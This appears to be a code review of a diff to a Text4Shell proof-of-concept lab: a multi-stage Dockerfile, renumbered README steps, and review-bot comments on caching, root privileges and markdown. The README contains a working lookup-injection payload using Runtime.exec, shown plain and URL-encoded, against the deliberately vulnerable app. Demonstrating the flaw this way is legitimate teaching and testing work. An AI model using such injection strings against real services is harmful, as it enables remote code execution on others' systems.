10 changes: 8 additions & 2 deletions Dockerfile
@@ -1,3 +1,9 @@
# Build the jar File
FROM maven:3.8.6-eclipse-temurin-8-alpine as build
WORKDIR /app
COPY . /app
RUN mvn clean install

# Use an official OpenJDK runtime as a parent image
FROM openjdk:8-jre-alpine

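Review bot: `COPY . /app` in the new build stage pulls the entire build context into the image, including any stale local `target/` directory and `.git`, and because it precedes `RUN mvn clean install`, every source edit invalidates the cached dependency download. Add a `.dockerignore` (or copy `pom.xml` and `src/` explicitly), and consider copying `pom.xml` first and resolving dependencies before copying the sources. Minor: `maven:3.8.6-eclipse-temurin-8-alpine` is pinned by tag only; pinning the builder image by digest keeps the PoC build reproducible.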
@@ -9,10 +15,10 @@ RUN apk update && apk add bash
WORKDIR /app

# Copy the fat jar into the container at /app
COPY /target/text4shell-poc.jar /app
COPY --from=build /app/target/text4shell-poc.jar /app

# Make port 8080 available to the world outside this container
EXPOSE 8080

# Run jar file when the container launches
CMD ["java", "-jar", "text4shell-poc.jar"]
CMD ["java", "-jar", "text4shell-poc.jar"]
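Review bot: `COPY --from=build /app/target/text4shell-poc.jar /app` correctly replaces the host-built jar with the artifact from the new build stage, but nothing in this runtime stage drops privileges, so the intentionally vulnerable service still runs as root inside the container; adding a `USER` line for an unprivileged account before `CMD` limits what a successful lookup injection can do to the container. The `CMD` line shows as a one-line change with no visible difference, presumably the missing trailing newline; worth confirming that is the only edit.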
28 changes: 11 additions & 17 deletions README.md
@@ -1,61 +1,55 @@
### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)
-------------

---

1. Maven install to create the fat jar

```
mvn clean install
```

2. Docker build
1. Docker build

```
docker build --tag=text4shell .
```

3. Docker run
2. Docker run

```
docker run -p 80:8080 text4shell
```

4. Test the app
3. Test the app

```
http://localhost/text4shell/attack?search=<anything>
```

5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:

```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

6. You can also try using `dns` or `url` prefixes.
5. You can also try using `dns` or `url` prefixes.

7. Get the container id
6. Get the container id

```
docker container ls
```

8. Get into the app
7. Get into the app

```
docker exec -it <container_id> bash
```

9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):

```
ls /tmp/
```

10. To stop the container
9. To stop the container

```
docker container stop <container_id>
```
```
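Review bot: the closing code fence (three backticks) added as the final line of the README is unmatched, since the fence around `docker container stop <container_id>` is already closed on the line above, so the file now ends with an open code block; drop it. Also, the heading `### Install maven` and its link still open the document even though the host-side Maven step was removed and the multi-stage Dockerfile now builds the jar itself; either delete the heading or reword it to say Maven is only needed for a local build outside Docker.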